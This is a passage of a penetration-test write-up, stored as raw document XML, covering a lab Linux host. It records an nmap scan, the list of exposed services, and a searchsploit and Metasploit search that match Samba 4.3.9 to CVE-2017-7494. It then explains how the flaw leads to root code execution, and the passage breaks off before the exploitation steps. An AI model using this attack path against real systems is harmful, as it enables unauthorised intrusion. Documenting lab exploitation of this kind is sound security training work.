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C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba is_known_pipename() Remote Code Execution → Root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: 10.124.239.226   (hostname: RED, workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty: Medium      Category: Network Exploitation / SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Nmap · SearchSploit · Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B1F27"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the full compromise of a Linux target running a vulnerable version of Samba. Enumeration with Nmap revealed a Samba 4.3.9-Ubuntu service, which was cross-referenced against public exploit databases and found to be vulnerable to CVE-2017-7494, a remote code execution flaw in Samba's is_known_pipename() function. Exploitation via Metasploit yielded an unauthenticated root shell, and the flag was retrieved from /root/flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">A full TCP port scan with service/version detection and default script scanning was run against the target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A -p- -sC -T4 -v 10.124.239.226</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="27863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2786306"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1 — Nmap scan initiation and host discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B1F27"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Results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560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="260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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="556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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.0.8+ (anonymous login allowed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="556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OpenSSH 7.2p2 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">dnsmasq 2.75</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="556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PHP built-in dev server (404 page)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">NetBIOS-SSN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba smbd 4.3.9-Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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666</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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pkzip-file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="556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Unidentified, .ZIP-style response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">5.7.12-0ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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12380</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="556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Apache httpd 2.4.18 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional observations from the scan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Anonymous FTP login was permitted on port 21, though directory listing was denied via PASV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB scripts confirmed the host as RED, running Samba 4.3.9-Ubuntu in the WORKGROUP workgroup, with message signing disabled — a configuration weakness in its own right.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The wide spread of exposed services (FTP, SSH, DNS, HTTP x2, SMB, MySQL) suggested a purpose-built vulnerable lab host rather than a hardened production system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The Samba version banner (4.3.9-Ubuntu) was the standout lead, as this release line is affected by a well-known, publicly disclosed remote code execution vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The Samba version was checked against known exploits using SearchSploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit Samba 4.3.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="7592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759252"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 — SearchSploit results for Samba 4.3.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This returned a match:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba 3.5.0 &lt; 4.4.14/4.5.10/4.6.4 — 'is_known_pipename()' Arbitrary Module Load (Metasploit)   |   Path: linux/remote/42084.rb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit corresponds to CVE-2017-7494, a vulnerability in which a malicious client can upload a shared library to a writable SMB share and cause the Samba server to load it as a plugin via the named-pipe is_known_pipename() mechanism — resulting in arbitrary code execution as the Samba service user (commonly root on default configurations).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The matching Metasploit module was confirmed available directly within msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf &gt; search is_known_pipename()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="6861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686110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3 — Metasploit module search results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1800"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="460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Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="140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Rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="116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Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/linux/samba/is_known_pipename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
